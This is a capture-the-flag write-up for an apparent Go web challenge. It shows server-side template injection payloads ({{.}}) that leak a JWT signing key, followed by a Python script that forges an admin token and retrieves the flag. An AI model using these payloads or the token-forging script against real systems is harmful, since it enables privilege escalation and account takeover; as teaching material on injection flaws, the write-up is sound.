Tags: jwt go ssti
Rating:
After analyzing the code, we can notice that we have a page in the application that displays the data entered by the user, namely his username.
```go
template.New("").Parse("Logged in as " + acc.id)
```
Moreover, the input information is not filtered in any way.
Check for SSTI capability using {{printf "%s" "ssti" }} and bingo, the server responded "Logged in as ssti".
Let's try to use {{.}} to get the output of the data structure that will be passed as input to the template.
The response to such a request would be:
Logged in as {{{.}} test_password false fasdf972u1031xu90zm10Av}.
The data structure is:
```go
type Account struct {
id string
pw string
is_admin bool
secret_key string
}
```
So we got a secret_key, and now we can create jwt.
To automate, write a script on Python
```python
import requests as r
import json
import jwt
host = 'http://34.146.226.125'
username = '{{.}}'
password = 'test_password'
r.get(f'{host}/regist', {'id': username, 'pw': password})
data = r.get(f'{host}/auth', {'id': username, 'pw': password}).content.decode()
token = json.loads(data)['token']
headers = {'X-Token': token}
data = r.get(f'{host}/', headers=headers).content.decode()
key = data.split()[-1][:-1]
token = jwt.decode(token, algorithms='HS256', key=key)
token['id'] = 'user'
token['is_admin'] = True
token = jwt.encode(token, key=key, algorithm='HS256')
headers = {'X-Token': token}
data = r.get(f'{host}/flag', headers=headers)
print(data.content.decode())
```